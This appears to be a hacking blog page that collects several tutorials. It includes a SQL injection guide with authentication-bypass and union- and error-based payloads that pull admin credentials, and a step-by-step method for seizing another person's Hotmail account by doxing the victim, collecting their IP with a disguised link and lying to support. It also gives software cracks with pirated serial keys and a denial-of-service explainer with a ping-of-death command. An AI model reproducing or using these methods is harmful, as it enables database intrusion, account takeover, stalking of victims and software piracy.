Adobe Photoshop CS5 Cracking Tutorial To Show The Importance of Host File in Windows

Thanx For Being Here...
Suppose i'm a web-designer and i want to Use Photoshop CS5 For Giving Extreme Graphics To my Projects or websites. then in that case i will use a maximum tools and resources available in Photoshop CS5 But the Problem is Photoshop Activation and registration...
So, Today I am Telling you about cracking Adobe Photoshop CS5.


 Step By Step Guide :~#

• Download  Adobe Photoshop from the official site of Adobe .
• After installing the trial version, now go to 

C:\WINDOWS\system32\drivers\etc\

• Then after going there you have to replace the file named "Hosts" with a new hosts file  - Download
• After you have replaced the file, just open the registration window & enter any of the serial number from below . 

1330-1036-2793-5476-2605-5729
1330-1193-9982-0310-7670-2199
1330-1470-0441-6829-3063-2553
1330-1976-0892-7993-3728-5629
1330-1527-2207-3657-2876-1004
1330-1361-6390-5309-5916-6481
1330-1614-6955-3965-0930-9043

Continue Reading

Sql Injection Part 1 Hacking Admin Panels Using sql Authentication bypass

Welcome To All Readers Of The Mindbenders
SQL Injection

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.


SQL Injection - 1 Authentication Bypass
Before we jump to the main topic, some basics…
SQL : Structured Query Language
It is meant for the communication between application and the database.

select : select is used to select the data.

insert : insert is used to insert the data.

update : update is used to update the data.

delete : delete is used to delete the data.

Some basic queries with examples

select * from <table name>;

> select * from news;

select <column name> from <table name>;

select news_title from news;

select <col1>, <col2> from <table name>;

> select news_content,news_title from news;

select <col1>, <col2> from <table name> where <col>=<val>;

> select news_content,news_title from news where ID=3;

select * from user_login where uid='<value>' and pass='<value2>';

select * from user_login where uid='name' and pass='password';

select * from admin where admin_id='admin' and pass='admin';

Now instead of password text we can enter this key for authentication bypass

'or'0'='0

The query structure will become

select * from admin where admin_id='admin' and pass=''or'0'='0';

Admin Pages can be somewhat like this,

/admin

/admin.asp

/admin.aspx

/admin.php

/administrator

/administrator.asp

/administrator.aspx

/administrator.php

/user

/user.php

/user.asp

/user.aspx

/login

/login.asp

/login.aspx

/login.php

/Admin

/Admin.asp

/Admin.aspx

/Admin.php

/Administrator

/Administrator.asp

/Administrator.aspx

/Administrator.php

/userlogin

/userlogin.asp

/userlogin.aspx

/userlogin.php

/Adminlogin

/Adminlogin.asp

/Adminlogin.aspx

/Adminlogin.php

/AdminLogin

/AdminLogin.asp

/AdminLogin.aspx

/AdminLogin.php

/newuser

/newuser.asp

/newuser.aspx

/newuser.php

/Newuser

/Newuser.asp

/Newuser.aspx

/Newuser.php

/NewUser

/cms

SQL Injection - 2 Union Based Injection

Again Some Basics,

order by : is used for the sorting purpose.

union : is used to select all the data but it wont repeat the same data.

a = {1,2,3,4}

b = {1,2,3,4,5,6,7}

a U b = {1,2,3,4,5,6,7}

database: is a group of tables.

table : is a group of columns & rows.

column & row : will store the data.

Information Schema: information schema is the information database, the place

that stores information about all the other databases that the MySQL server

maintains. We can access the information by using it‟s objects tables and columns.

information_schema.tables: It contains all the information about the tables.

Information_schema.columns: It contains all the information about the columns

i.e.: db1 (It could provide you information about its own database.)

       db2 (It could provide you information about its own database.)

       db3 (It could provide you information about its own database.)

But

information_schema will be storing info about all db1,db2,db3

table_name: is used to represent the name of the tables.

column_name: is used to represent the name of the columns.

version(): to see the database version

user(): to see the default user of the database

database(): to see the name of the database

concat() , group_concat(): is used for the concatination purpose.

Step:1 find something=something

           i.e. : id=2, catid=5, prod=savita

           www.site.com/page.php?id=1

           apply '

           if it is generating any error, blank page, data missing

           > good news for us !!!

           > website may be vulnerable.

Step:2 To see the number of columns which are displaying the data.

[ Remove ' ]

note: whatever data we see on the page must be fetched from some database ->

tables -> columns

> and not only 1 column but more than 1 column from different tables must be

displaying the data.

i.e. : www.site.com/page.php?id=1 order by 1 -- || n

        www.site.com/page.php?id=1 order by 2 -- || n

        www.site.com/page.php?id=1 order by 3 -- || n

        www.site.com/page.php?id=1 order by 4 -- || n

        www.site.com/page.php?id=1 order by 9 -- || n

        www.site.com/page.php?id=1 order by 10 -- || Error

so there are 9 columns which are fetching the data.

Step: 3 To see the visible column

union select will be used.

union select 1,2,3,4,5,6,7,8,9 --

i.e.:    www.site.com/page.php?id=1 union select 1,2,3,4,5,6,7,8,9 –

to avoid the by default data

          www.site.com/page.php?id=-1 union select 1,2,3,4,5,6,7,8,9 --

step: 4 Get the table names

i.e. :      www.site.com/page.php?id=-1 union select 1,table_name,3,4,5,6,7,8,9 from

information_schema.tables --

Admin

Step:5 Get the column names

i.e. :     www.site.com/page.php?id=-1 union select 1,column_name,3,4,5,6,7,8,9 from

information_schema.columns where table_name='admin' --

username

password

Step:6 Get the data.

i.e.:      www.site.com/page.php?id=-1 union select 1,password,3,4,5,6,7,8,9 from

admin --

username : admin

password : adminpass

Sometimes, while fetching the columns we may face some error, so we need to

convert table name(string) to ascii.

use: http://easycalculation.com/ascii-hex.php

string: admin

Equivalent Ascii Value : char(97,100,109,105,110)

Sometimes, while fetching the table names, we may see only one table name,

to fetch all the tables we have to use

group_concat(table_name)

sometimes, we may face a situation to count the number of tables, so

count(table_name)

Sometimes, we may need to fetch the name of the tables within the viewsize of the

page.

limit 0,1 -- to see the 1st table name

Sometimes, we need to see username and password all together,

group_concat(user,0x3a,pass) || user:pass

HackBar - add on of firefox

SQL Injection - 3 Error Based Injection

Step: 1 find something=something

i.e.: id=3, catid=3, uid=3 etc etc etc

and apply '

Step: 2 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1

table_name from information_schema.tables)) –

Let‟s understand the query.

and 1=convert(int,(select top 1 table_name from information_schema.tables)) –

from this, you have already understood

select top 1 table_name from information_schema.tables

but only top 1 is unfamiliar with you, top 1 will be pointing to the 1 st table name

from the information_schema.tables

Let‟s assume that we got the one name that is “ABCD”

and 1=convert(int,(ABCD)) –

It will try to convert ABCD to the integer. String to Integer conversion is not

possible directly so it will definitely generate an error.

The error will be containing the name of a table.

So, we have got the one table, if we want to fetch the 2nd table then we may need

to

http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1 table_name

from information_schema.tables where table_name not in(„ErrorTable‟))) –

this will display you the 2nd table, to see more tables, you can put the name of the

tables in not in(„ErrorTable1‟,‟ErrorTable2‟)

Step: 3 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='ErrorrTable'))

--

Now if we want to fetch the 2nd column name then, the query would be somewhat

like,

http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='ErrorTable'

and column_name not in('ErrorColumn1'))) –

http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='ErrorTable'

and column_name not in('ErrorColumn1',‟ErrorTable2‟))) –

After finding the table name and the column name we can fetch the data.

Step: 4 http://www.site.com/page.aspx?id=1 and 1=convert(int,(select top 1

ErrorColumnName from ErrorTableName)) --

Continue Reading

Hack Almost any Hotmail account without keylogger , Phishing in 24 hours

Welcome To All, I see alot of new members joining, and wanting to learn how to hack somebodies hotmail account..or asking others to do it for them.
Most are under the illusion that there's this "hack" button you can press and you instantly get their password, however this is not the case.
Most newb's are put off by the fact that they have to keylog or phish their way into getting a password, and they resort to asking the "hackers".
But i'll provide an easy alternative.

This method is called Reverting, and you will be sending a form in to microsoft customer support to reset the password for your (or somebody elses) hotmail account.

NOTE: If you are interested in protecting yourself against this hacking method, please refer to this Blog.

For this method, it helps to know the person, even a little, but i'll still give you a step-by-step tut on how to find the information and fill out each part of the form.

NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY, I AM NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM THIS.

Step 1: go here:

https://support.live.com/eform.aspx?prod...mcs&scrx=1

Step 2: Give them your victims full name.

Now, if you do not know their first name, try the following things to find it.

First, try using these two sites, simply enter their email and hit return.

http://www.pipl.com/email
http://com.lullar.com

if you want more, google their hotmail account(s), for example, type into google:

"victimshotmail@hotmail.com"

Include the quotes, cause this searches for only the hotmail account.
If you gain any results, it will most likely be forums or if you're lucky, social networking sites, that they have filled out their info on.
Go through these searches, and look at every one, even make a .txt file in notepad pasting down all the info you can on them.
Once you're done, if you havnt got their last name, keep reading..if you have, goto step 3.

Presuming you dont yet have their last name, try going to social networking sites, like:
http://www.myspace.com
http://www.facebook.com
http://www.bebo.com
http://www.friendster.com

Or any others you can think of, and search for their hotmail account using the websites search feature.
if you get any results, you're in luck, most of the time people include alot of information on themselves in there. Follow any leads you can find on the info, and even ask them or their friends (look up a tutorial on social engineering info out of people first, it will help).

Now another thing you can do is use http://www.whois.com IF your slave has their own website.

If you dont have it by now, maybe you should find an easier target, or if you're desperate, use this technique to hack one of their rl best friends, and alot of the time they have their full name assigned to your victims hotmail address, in their addressbook.

Or, I sometimes just say "I'm pretty sure I only put in my first name at registration, I'm paranoid like that" or something along those lines... It's worked for me.

BTW: This is called d0xing, or "documenting", basically harvesting info on people, it's completely legal as long as you get all your info from the public domain (forums, social networking sites etc).

Step 3: The e-mail address for us to send a response:
Simple, give them your email address... could use a fake one if you're paranoid (one you got access too), but I don't see any risk.

Step 4: Primary e-mail address/member ID associated with the account you are inquiring about:
Here you put in your victims email address (the one you're trying to hack). Then click Continue.

Step 5: Date of birth.
You can simply give them the year, if you dont know any further then that..but if you want to be on the safe side, read step 2, and use those techniques to find their date of birth.

Step 6: Country
If you dont know their country, which you probably should, use their IP address which you will have in one of the next steps to find it, by using
http://www.ip-adress.com/ip_tracer/

Step 7: State
same deal, use their IP addy if you dont know it already

Step 8: ZIP or postal code
Same deal again, it's usually correct if you use the IP addy...just use http://www.ip-adress.com/ip_tracer/
and find their town/suburb or whatever, and google the ZIP code for it.

Step 9: The secret answer to your question
simply put "i dont remember"

Step 10: Your alternate email address
for this, you just put in the email address you're trying to hack, you dont need their alternate email address.

Step 11: Your IP Address
Okay so here's probably the toughest one, but it's still easy. (NOTE: It's very hard to revert an account unless you successfully complete this step)
There's alot of ways to get their IP, i'll give you the easy ones.

Email: Get them to send you an email somehow, it doesnt matter how, you can just send an email saying:
"hey, how are you?" and they'll probably reply. Once you have their email (dont use old emails, please, everybody uses dynamic IP's these days)
right click on it, and click "view source", you will see something like this:

...now you want to find "X-Originating-IP: [XX.XXX.XX.XX]" That is their IP address. If the email source is all jibberish and looks encrypted, try what one user suggested:

(09-24-2010 07:59 AM)TOMMIE Wrote: 
This is from Hotmail? Right? I get this too..
I forwarded these emails to my broadband providers base email (NOT Webmail), then selected each one and `Save as`, it will prompt you to save in .eml format - save to desktop, then right-click and open in Notepad. You will see detail then.
hth

Website: Go here http://www.syntaxmaster.info and register an account for free, it's real easy.

Now once you're registered, go to Software/Tools > IP Stealer; and then you can type in the URL you want your IP stealer to redirect to.. so just google or myspace or something will do. Now you'll see above that they give you your URL, you just send them there and it'll grab their IP, redirect them to google (or whatever site you choose), and then show their IP down at the bottom of the page.

I suggest using spam or http://www.doiop.com/ to shorten your URL and make it custom, you could make it something like:

http://www.doiop.com/profile-329479

And viola it'll look like a social networking site "Hey, I'm katie.  I'm looking to meet new people and was wondering if you wanted to be friends? ^_^ This is my profile btw: <give fake link>"

Something like thaat. 

MSN: if you can talk to them on msn, then you can get their IP that way too..there's two ways, either download a easy-to-use script, or do it manually with cmd,
i'll show you how to do it manually first.

Manually: Send them a file, or get them to send you a file.
"hey, i love that song, can you send me it?" or "omg, this is the funniest picture ever".
Before you start the transfer though, goto start > run (if you're using vista, just press the windows key) and type in cmd, and hit enter.

type in the following: netstat -n

and hit enter, it will show you a list of active connections to different IP's.

Remember or take a screenshot of those IP's, because once you start the transfer, type in netstat again while it's transferring and check for any new IP's, that is your victims IP.

With a script:
IF you have windows live messenger plus (probably the best WLM IMO), download this script:
http://rapidshare.com/files/133356881/IPGet_1.50.rar
It's called IP-Get, and will show you your current msn contacts IP addresses IF you're currently connected to them with a fileshare. It will also allow you to save the IP addresses, and look up their locations.

Here is a screenie of IP-get:


There are other ways, but surely, you should have been able to get their IP by now...if not, look up a tut on it, using the search feature.

Step 12: Your internet service provider
very easy to find, use their IP, either using the IP get script if you have it, or http://www.ip-adress.com/ip_tracer/

Step 13: The last date and time that you successfully signed in
Unless you know this as a fact, either take your best guess, say you dont remember, or yesterday.

Step 14: The names of any folders that you created in addition to the default folders
leave this blank, or say you dont know (unless you know this for a fact).

Step 15: Names of contacts in your hotmail address book
give them all the contacts you know are definately or most likely in there, including yourself, and even their other accounts (they might add themselves, everybody seems to). Also give them wilma@live.com and smarterchild@hotmail.com, as most people have them added.

Step 16: Subjects of any old mail that is in your inbox
okay just use common sense for this one, things to include are:
hey, how are you, RE:, FW:, admin, windows live, hotmail staff, recovery, registration, support, lol, password, comfirmation, noreply, delivery status notification (failure).

Also, if they are subscribed to any forums (like hackforums(but please dont hack other members )), social networking sites (like myspace, bebo) or online games (like RuneScape, WoW), then be sure to include them too.

Step 17: Names of contacts on your messenger contact list
If you happen to know any of their friends, this is where you put their display name...if you dont have them added, put their first names, and if you dont know them at all, just leave it blank, or say you dont remember.

Step 18: Your Messenger nickname
If you know it, put it in..if you dont, say "i cant remember it exactly" or leave it blank.

Step 19:
The rest you dont really need to worry about, except for in additional info, can put anything else that might make you sound more convincing..like:

"please do your best to recover my account, i dont want to go and have to add all my friends again, it'd be a great help if you got it back for me, thank you in advance."

obviously dont put exactly that, but you get the gist of it 

Okay, i believe that is it, within 24 hours you will recieve an email from customer support, they will either give you a link to reset your (victims) password, or ask for you to send it again with more info, as an email reply..and in that case, you dont have much luck, cause they can just get your IP address from the email and know you're lying  so try again, and hope you get a more gullible staff member. If you have firefox, 

I did give you a link to download earlier, here is a virus scan for you guys who arent sure.

Quote:
File Info

Report generated: 1.7.2009 at 14.45.40 (GMT 1)
Filename: IPGet_1.50.plsc
File size: 721 KB
MD5 Hash: 081f4ed7f145689e1911b16fc49fa4b4
SHA1 Hash: 3B9348B972ACA7006F9E38951EE76AB632F54EF0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 24

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
Malware Hash Registry - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -

Scan report generated by
NoVirusThanks.org

If you have any questions, ask here,  I didn't rip any of this from other tuts, typed it up myself. Thanks for reading, I know it's long, I've reached the max character limit

Continue Reading

Download Youtube Videos in 3 seconds with Amazing Youtube Downloader

Hi Friends,

So This Tutorial is Very Small.

Last Night I was Searcing a youtube Video and when i Found that video. 

Then Accidently in place of  www.youtube.com/blahblah there is 2 ss  Extra added and pressed enter.

Then the result was so shocking.

now see what really happened at that moment.

Origional youtube video Url

http://www.youtube.com/watch?v=yaDGUOcbOWI&feature=plcp

The Accidently modified youtube video Url

http://www.ssyoutube.com/watch?v=yaDGUOcbOWI&feature=plcp

I Found A Download Info For My Youtube Video Then i Selected one of the Downloading options and boom downloading started in one go...

Now Download Any Of Your Youtube, Metacafe Video in 2 SS :D and without any Downloader.

Continue Reading

Cracking Internet Download manager (idman) For Using Lifetime

These days every body do want a download manager but its a paid one and its crack rarely works


so here is my tut for cracking IDM for life time  

you can update IDM too



Mostly time after updating your IDM, it shows error "you have registered IDM using fake serial key".

follow these steps:

* Download the IDM, then click on Registration.

* A dialog box will appear asking for Name, Last Name, Email Address and Serial Key.

* Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:

RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M
UK3DV-E0MNW-MLQYX-GENA1
398ND-QNAGY-CMMZU-ZPI39
GZLJY-X50S3-0S20D-NFRF9
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
UVQW0-X54FE-QW35Q-SNZF5
FJJTJ-J0FLF-QCVBK-A287M


* After clicking, it will show error message that you have registered IDM using fake serial key and IDM will exit.

* Now Go to the path C:\WINDOWS\system32\drivers\etc\hosts

* Open hosts file with notepad.

* Now copy the below lines of code and paste it to below 127.0.0.1 localhost

127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com

* Save it.

* Now check IDM, it should be converted to full version.

Note: In Windows 7 sometimes it denied access to write anything on hosts file, so first you must be logged in as Administrator and then change the file permissions of hosts file.


dont worrry i will teach u to edit it 


Right click on hosts file and click “Properties”.

2. Switch to “Security” tab and click “Advanced” button.

3. Switch to “Owner” tab and click “Edit…”.

4. Highlight your user account or administrators group and click “OK” twice to quite the “Advanced Security Settings” dialog box.

5. On the “Security” tab of “Properties” dialog box, click “Edit…”.

6. Highlight Administrators group, check the box for “Full control” under “Allow” and click “OK”.

Continue Reading

Find IP Address of Mail Sender

How to find the IP address of the sender in Yahoo! mail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Yahoo! Mail
1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail.
5. You should see similar headers like this:Yahoo! headers : nameLook for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.That is be the IP address of the sender!
6. Track the IP address of the sender

How to find the IP address of the sender in Hotmail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail.
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP addressHotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like thisHotmail headers : nameLook for Received: from followed by IP address within square brackets[].In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like thisHotmail headers : nameLook for Received: from followed by IP address within square brackets[].In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender


How to find the IP address of the sender in Gmail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Gmail:
1.Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,* Click on More options corresponding to that thread. You should get a bunch of links.* Click on Show original.
4. You should get headers like this:Gmail headers : nameLook for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is65.119.112.245.That is be the IP address of the sender!
5. Track the IP address of the sender.

Continue Reading

Dos ! A Complete Reference To Denial of service

Denial Of Service(DOS)


DOS Attacks or Denial Of Services Attack have become very common amongst Hackers who use them as a path to
fame and respect in the underground groups of the Internet. Denial of Service Attacks basically means denying valid
Internet and Network users from using the services of the target network or server. It basically means, launching an
attack, which will temporarily make the services, offered by the Network unusable by legitimate users.
In others words one can describe a DOS attack, saying that a DOS attack is one in which you clog up so much
memory on the target system that it cannot serve legitimate users. Or you send the target system data packets, which
cannot be handled by it and thus causes it to either crash, reboot or more commonly deny services to legitimate users.
DOS Attacks are of the following different types-:
1. Those that exploit vulnerabilities in the TCP/IP protocols suite.
2. Those that exploit vulnerabilities in the Ipv4 implementation.
3 There are also some brute force attacks, which try to use up all resources of the target system and
the services unusable.
make
Before I go on with DOS attacks, let me explain some vulnerabilities in TCP/IP itself. Some common vulnerabilities
are Ping of Death, Teardrop, SYN attacks and Land Attacks.

Ping of Death

This vulnerability is quite well known and was earlier commonly used to hang remote systems (or even force them to
reboot) so that no users can use its services. This exploit no longer works, as almost all system administrators would
have upgraded their systems making them safe from such attacks.
In this attack, the target system is pinged with a data packet that exceeds the maximum bytes allowed by TCP/IP,
which is 65 536. This would have almost always caused the remote system to hang, reboot or crash. This DOS attack
could be carried out even through the command line, in the following manner:
The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the victim's
computer:
C:\windows>ping -l 65540

Teardrop
The Teardrop attack exploits the vulnerability present in the reassembling of data packets. Whenever data is being
sent over the Internet, it is broken down into smaller fragments at the source system and put together at the
destination system. Say you need to send 4000 bytes of data from one system to the other, then not all of the 4000
bytes is sent at one go. This entire chunk of data is first broken down into smaller parts and divided into a number of
packets, with each packet carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets,
then:
The first Packet will carry data from 1 byte to 1500 bytes
The second Packet will carry data from 1501 bytes to 3000 bytes
The third packet will carry data from 3001 bytes to 4000 bytes
These packets have an OFFSET field in their TCP header part. This Offset field specifies from which byte to which
byte does that particular data packet carries data or the range of data that it is carrying. This along with the sequence
numbers helps the destination system to reassemble the data packets in the correct order. Now in this attack, a series
of data packets are sent to the target system with overlapping Offset field values. As a result, the target system is not
able to reassemble the packets and is forced to crash, hang or reboot.
Say for example, consider the following scenario-: (Note: _ _ _ = 1 Data Packet)
Normally a system receives data packets in the following form, with no overlapping Offset values.
___ (1 to 1500 bytes)
___ (1501 to 3000 bytes)
___ (3001 to 4500 bytes)



Now in a Teardrop attack, the data packets are sent to the target computer in the following format:
___ (1 to 1500 bytes)
___ (1500 to 3000 bytes)
___ (1001 to 3600 bytes)
When the target system receives something like the above, it simply cannot handle it and will crash or hang or reboot.

SYN Attack


The SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how SYN Attacks work,
you need to first know how TCP/IP establishes a connection between two systems. Whenever a client wants to
establish a connection with a host, then three steps take place. These three steps are referred to as the three-way
handshake.
In a normal three way handshake, what happens is that, the client sends a SYN packet to the host, the host replies to
this packet with a SYN ACK packet. Then the client responds with a ACK (Acknowledgement) packet. This will be
clearer after the following depiction of these steps-:
1. Client --------SYN Packet--------------> Host
In the first step the client sends a SYN packet to the host, with whom it wants to establish a three-way connection.
The SYN packet requests the remote system for a connection. It also contains the Initial Sequence Number or ISN of
the client, which is needed by the host to put back the fragmented data in the correct sequence.
2. Host -------------SYN/ACK Packet----------> Client
In the second step, the host replies to the client with a SYN/ACK packet. This packet acknowledges the SYN packet
sent by the client and sends the client its own ISN.
3. Client --------------ACK-----------------------> Host
In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a ACK packet.
These three steps together are known as the 3-way handshake and only when they are completed is a complete TCP/
IP connection established.
In a SYN attack, several SYN packets are sent to the server but all these SYN packets have a bad source IP Address.
When the target system receives these SYN Packets with Bad IP Addresses, it tries to respond to each one of them
with a SYN ACK packet. Now the target system waits for an ACK message to come from the bad IP address.
However, as the bad IP does not actually exist, the target system never actually receives the ACK packet. It thus
queues up all these requests until it receives an ACK message. The requests are not removed unless and until, the
remote target system gets an ACK message. Hence these requests take up or occupy valuable resources of the target
machine.
To actually affect the target system, a large number of SYN bad IP packets have to be sent. As these packets have a
Bad Source IP, they queue up, use up resources and memory or the target system and eventually crash, hang or
reboot the system.

Land Attacks


A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP Address, the IP address of
the target system itself is used. This creates an infinite loop between the target system and the target system itself.
However, almost all systems have filters or firewalls against such attacks.



Smurf Attacks


A Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests are sent to a system
(normally the router) in the Target Network, using Spoofed IP Addresses from within the target network. As and
when the router gets a PING message, it will route it or echo it back, in turn flooding the Network with Packets, and
jamming the traffic. If there are a large number of nodes, hosts etc in the Network, then it can easily clog the entire
network and prevent any use of the services provided by it.
Read more about the Smurf Attacks at CERT: http://www.cert.org/advisories/CA-98.01.smurf.html

UDP Flooding

This kind of flooding is done against two target systems and can be used to stop the services offered by any of the
two systems. Both of the target systems are connected to each other, one generating a series of characters for each
packet received or in other words, requesting UDP character generating service while the other system, echoes all
characters it receives. This creates an infinite non-stopping loop between the two systems, making them useless for
any data exchange or service provision.

Distributed DOS Attacks

DOS attacks are not new; in fact they have been around for a long time. However there has been a recent wave of
Distributed Denial of Services attacks which pose a great threat to Security and are on the verge of overtaking
Viruses/Trojans to become the deadliest threat to Internet Security. Now you see, in almost all of the above TCP/IP
vulnerabilities, which are being exploited by hackers, there is a huge chance of the target's system administrator or
the authorities tracing the attacks and getting hold of the attacker.
Now what is commonly being done is, say a group of 5 Hackers join and decide to bring a Fortune 500 company's
server down. Now each one of them breaks into a smaller less protected network and takes over it. So now they have
5 networks and supposing there are around 20 systems in each network, it gives these Hackers, around 100 systems
in all to attack from. So they sitting on there home computer, connect to the hacked less protected Network, install a
Denial of Service Tool on these hacked networks and using these hacked systems in the various networks launch
Attacks on the actual Fortune 500 Company. This makes the hackers less easy to detect and helps them to do what
they wanted to do without getting caught. As they have full control over the smaller less protected network they can
easily remove all traces before the authorities get there.
Not even a single system connected to the Internet is safe from such DDOS attacks. All platforms Including Unix,
Windows NT are vulnerable to such attacks. Even MacOS has not been spared, as some of them are being used to
conduct such DDOS attacks.
If You Have Problems then i have solutions of your Problems...

Continue Reading